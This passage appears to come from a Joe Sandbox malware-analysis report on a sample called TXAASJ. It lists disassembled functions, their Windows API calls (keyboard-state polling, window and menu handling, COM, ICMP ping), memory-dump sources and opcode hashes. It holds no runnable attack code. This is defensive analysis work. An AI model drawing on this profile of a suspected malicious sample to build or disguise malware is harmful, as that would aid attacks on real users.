                                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00EBA0BB
                                                                                                                        • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00EBA0C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                        • String ID: static
                                                                                                                        • API String ID: 2559357485-2160076837
                                                                                                                        • Opcode ID: aab045e4a19a9e05b81a1d678f70ac53659506162729355cf5910b920786b24c
                                                                                                                        • Instruction ID: ff1980309f5191522cb08e16d3e7aaa7d704b0044657cf83762f5d6078ac643a
                                                                                                                        • Opcode Fuzzy Hash: aab045e4a19a9e05b81a1d678f70ac53659506162729355cf5910b920786b24c
                                                                                                                        • Instruction Fuzzy Hash: E131BE31105215AFDF21AF65EC09FEB3B69FF09364F140225FA25B20A0D731D824DBA1
                                                                                                                        Function 00E75C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E75CCA
                                                                                                                          • Part of subcall function 00E7889E: __getptd_noexit.LIBCMT ref: 00E7889E
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00E75D63
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00E75D99
                                                                                                                        • __gmtime64_s.LIBCMT ref: 00E75DB6
                                                                                                                        • __allrem.LIBCMT ref: 00E75E0C
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E75E28
                                                                                                                        • __allrem.LIBCMT ref: 00E75E3F
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E75E5D
                                                                                                                        • __allrem.LIBCMT ref: 00E75E74
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E75E92
                                                                                                                        • __invoke_watson.LIBCMT ref: 00E75F03
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 384356119-0
                                                                                                                        • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                        • Instruction ID: f082f2dde2e24b620e2a3a6cf3fcb900d0e5f30c8a61d4e2f69644c7e59ca516
                                                                                                                        • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                                                                                                        • Instruction Fuzzy Hash: F1719973A01B16ABD714AE79CC41B9AB3E4EF14764F14913AF51CF7681E7B0DA408B90
                                                                                                                        Function 00E957FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00E95816
                                                                                                                        • GetMenuItemInfoW.USER32(00F118F0,000000FF,00000000,00000030), ref: 00E95877
                                                                                                                        • SetMenuItemInfoW.USER32(00F118F0,00000004,00000000,00000030), ref: 00E958AD
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00E958BF
                                                                                                                        • GetMenuItemCount.USER32(?), ref: 00E95903
                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 00E9591F
                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 00E95949
                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 00E9598E
                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E959D4
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E959E8
                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E95A09
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176008265-0
                                                                                                                        • Opcode ID: 08b17ee5bd8e8067b20b7c6d94053d5d3b045adda889198c33e8baeff85947c7
                                                                                                                        • Instruction ID: 73740f8ea43fb657c4c703997f5003e0813de5e0d7f24e1d3d93066d9116e200
                                                                                                                        • Opcode Fuzzy Hash: 08b17ee5bd8e8067b20b7c6d94053d5d3b045adda889198c33e8baeff85947c7
                                                                                                                        • Instruction Fuzzy Hash: 9661CE72900649EFEF12CFA4EC88AEE7BB8EB45318F14155AE852B7251D371AD05CB20
                                                                                                                        Function 00EB9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00EB9AA5
                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00EB9AA8
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EB9ACC
                                                                                                                        • _memset.LIBCMT ref: 00EB9ADD
                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EB9AEF
                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00EB9B67
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 830647256-0
                                                                                                                        • Opcode ID: 1084d40e4a8f9a4c9db6238042a1ed4c3c69906c8782f2e8a6a827017fdbf04f
                                                                                                                        • Instruction ID: 5ade5518dd255ce6830f295ed0236921ed39ebc5022e395b68e2a5353449e906
                                                                                                                        • Opcode Fuzzy Hash: 1084d40e4a8f9a4c9db6238042a1ed4c3c69906c8782f2e8a6a827017fdbf04f
                                                                                                                        • Instruction Fuzzy Hash: 1A615C75A00208AFDB11DFA8CC81EEEB7F8EF09714F104159FA15E72A2D770A945DB50
                                                                                                                        Function 00E93569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00E93591
                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00E93612
                                                                                                                        • GetKeyState.USER32(000000A0), ref: 00E9362D
                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00E93647
                                                                                                                        • GetKeyState.USER32(000000A1), ref: 00E9365C
                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00E93674
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00E93686
                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00E9369E
                                                                                                                        • GetKeyState.USER32(00000012), ref: 00E936B0
                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00E936C8
                                                                                                                        • GetKeyState.USER32(0000005B), ref: 00E936DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 541375521-0
                                                                                                                        • Opcode ID: 21958888117a8612825a5b8172c4d804f02b87e132c6ada3969d2af21487a6ee
                                                                                                                        • Instruction ID: d14509caaffefa0eb709341d8a4cc30902240c5d89c85deeb744e9d72671b3cd
                                                                                                                        • Opcode Fuzzy Hash: 21958888117a8612825a5b8172c4d804f02b87e132c6ada3969d2af21487a6ee
                                                                                                                        • Instruction Fuzzy Hash: 1541D4745087C97DFF30D77498143A5BEA1AB1534CF08A05AD5C6663C3EBA49BC8CBA2
                                                                                                                        Function 00E8A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00E8A2AA
                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00E8A2F5
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00E8A307
                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E8A327
                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00E8A36A
                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E8A37E
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E8A393
                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00E8A3A0
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8A3A9
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00E8A3BB
                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E8A3C6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2706829360-0
                                                                                                                        • Opcode ID: 9d308b88815d4ecd82f040c5131814dccbc4733c884eef1b353212df88f7ac15
                                                                                                                        • Instruction ID: 1d46738a5caa0df2c6070a912cfb021ff006fb29a83d3ca040b11be9f383c231
                                                                                                                        • Opcode Fuzzy Hash: 9d308b88815d4ecd82f040c5131814dccbc4733c884eef1b353212df88f7ac15
                                                                                                                        • Instruction Fuzzy Hash: 60415031900219AFDB11EFA5DC449DEBFB9FF04344F049066E519B3261DB70AA49CBA1
                                                                                                                        Function 00EAB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E584A6: __swprintf.LIBCMT ref: 00E584E5
                                                                                                                          • Part of subcall function 00E584A6: __itow.LIBCMT ref: 00E58519
                                                                                                                        • CoInitialize.OLE32 ref: 00EAB298
                                                                                                                        • CoUninitialize.OLE32 ref: 00EAB2A3
                                                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00EDD8FC,?), ref: 00EAB303
                                                                                                                        • IIDFromString.OLE32(?,?), ref: 00EAB376
                                                                                                                        • VariantInit.OLEAUT32(?), ref: 00EAB410
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00EAB471
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                        • Opcode ID: fd6ee8d56a1f039a3dcccfd14266139f97bfd759824825fc6f02668b0ea67dd8
                                                                                                                        • Instruction ID: 777394ba4222146c012fcead6266b337804d9c80e0dec95411118a9ba311f009
                                                                                                                        • Opcode Fuzzy Hash: fd6ee8d56a1f039a3dcccfd14266139f97bfd759824825fc6f02668b0ea67dd8
                                                                                                                        • Instruction Fuzzy Hash: 1D619D706083019FCB10DF54D884B6EBBE8EF4A714F04581AF995AB292D7B0FD48CB92
                                                                                                                        Function 00EA8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00EA86F5
                                                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00EA873A
                                                                                                                        • gethostbyname.WSOCK32(?), ref: 00EA8746
                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00EA8754
                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA87C4
                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00EA87DA
                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00EA884F
                                                                                                                        • WSACleanup.WSOCK32 ref: 00EA8855
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                        • String ID: Ping
                                                                                                                        • API String ID: 1028309954-2246546115
                                                                                                                        • Opcode ID: 7794dec85838c62f0f2255cecad6a2b87e935bbddcd2f9927f0bd4b8d088afc8
                                                                                                                        • Instruction ID: 0751113f4cd2820773893bb43c02733b7c1280002aa28806a0e32cd6e03eb6f9
                                                                                                                        • Opcode Fuzzy Hash: 7794dec85838c62f0f2255cecad6a2b87e935bbddcd2f9927f0bd4b8d088afc8
                                                                                                                        • Instruction Fuzzy Hash: 6B51D1316042009FDB10EF21DE85B6ABBE4EF49724F50992AF956FB2A0DF34E804CB41
                                                                                                                        Function 00EB9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00EB9C68
                                                                                                                        • CreateMenu.USER32 ref: 00EB9C83
                                                                                                                        • SetMenu.USER32(?,00000000), ref: 00EB9C92
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EB9D1F
                                                                                                                        • IsMenu.USER32(?), ref: 00EB9D35
                                                                                                                        • CreatePopupMenu.USER32 ref: 00EB9D3F
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00EB9D70
                                                                                                                        • DrawMenuBar.USER32 ref: 00EB9D7E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 176399719-4108050209
                                                                                                                        • Opcode ID: 39406c8fab12c01bc847efbf825dfaa2a35c9ac9ff1f52c46b72a9105650344f
                                                                                                                        • Instruction ID: 8275880ce32ba711c9683879f59afe42cfa09c99ea7cd857754e318309524813
                                                                                                                        • Opcode Fuzzy Hash: 39406c8fab12c01bc847efbf825dfaa2a35c9ac9ff1f52c46b72a9105650344f
                                                                                                                        • Instruction Fuzzy Hash: 4A418B75A01209EFDB11EF69E884BDABBF5FF88318F144029EA45A7352D730A914DF60
                                                                                                                        Function 00E9EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00E9EC1E
                                                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E9EC94
                                                                                                                        • GetLastError.KERNEL32 ref: 00E9EC9E
                                                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00E9ED0B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                        • API String ID: 4194297153-14809454
                                                                                                                        • Opcode ID: 14db8125d889819bf43b23683cd3a84804f945e28023a2fb2175176fe8631553
                                                                                                                        • Instruction ID: 5964fb5b7790a49b486a395e2419f135d3a90943aa3e26b63c8052602bae4788
                                                                                                                        • Opcode Fuzzy Hash: 14db8125d889819bf43b23683cd3a84804f945e28023a2fb2175176fe8631553
                                                                                                                        • Instruction Fuzzy Hash: F231CF35A00209AFCB00EB64CD45AAEB7B8FB44705F149426EA02F7391DA70DA45DB81
                                                                                                                        Function 00E8C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E8C782
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00E8C78D
                                                                                                                        • GetParent.USER32 ref: 00E8C7A9
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E8C7AC
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00E8C7B5
                                                                                                                        • GetParent.USER32(?), ref: 00E8C7D1
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E8C7D4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                        • Opcode ID: 38bc4934198a24f7dbdd598ce576d1cc5f09c7c5d8d9819d4615fdfcca57cfe5
                                                                                                                        • Instruction ID: 4b305362a2dc4a6c36ed41790917a5b46a3eea54031ea10b8d075f188373bcec
                                                                                                                        • Opcode Fuzzy Hash: 38bc4934198a24f7dbdd598ce576d1cc5f09c7c5d8d9819d4615fdfcca57cfe5
                                                                                                                        • Instruction Fuzzy Hash: 9821C474A00208AFCF05EB60CC95EFEBBA5EB46300F200156F52AF32D1DB759819AB60
                                                                                                                        Function 00E8C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E5CAEE: _memmove.LIBCMT ref: 00E5CB2F
                                                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E8C869
                                                                                                                        • GetDlgCtrlID.USER32 ref: 00E8C874
                                                                                                                        • GetParent.USER32 ref: 00E8C890
                                                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E8C893
                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 00E8C89C
                                                                                                                        • GetParent.USER32(?), ref: 00E8C8B8
                                                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E8C8BB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000009.00000002.2269327603.0000000000E51000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E50000, based on PE: true
                                                                                                                        • Associated: 00000009.00000002.2268548165.0000000000E50000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EDD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269527518.0000000000EFE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269762874.0000000000F0A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        • Associated: 00000009.00000002.2269826415.0000000000F14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_9_2_e50000_TXAASJ.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                        • String ID: ComboBox$ListBox
                                                                                                                        • API String ID: 313823418-1403004172
                                                                                                                        • Opcode ID: f409b465b0d89bfdc2576612c248557fb28d7704fdc2551d9526c3aedbd6cf0d
                                                                                                                        • Instruction ID: 5f35ed0d8b19fbcdcabffd90c4b8a8ac9ba3022cf120ec238f2cfc2417a894d7
                                                                                                                        • Opcode Fuzzy Hash: f409b465b0d89bfdc2576612c248557fb28d7704fdc2551d9526c3aedbd6cf0d
                                                                                                                        • Instruction Fuzzy Hash: 4021C471A00204AFDF04ABA0CC95EFEBBA5EB45300F100011F515F3191DB749819AB60
                                                                                                                        Function 00E8C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32 ref: 00E8C8D9
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00E8C8EE
                                                                                                                        • _wcscmp.LIBCMT ref: 00E8C900
                                                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00E8C97B
                                                                                                                        Strings
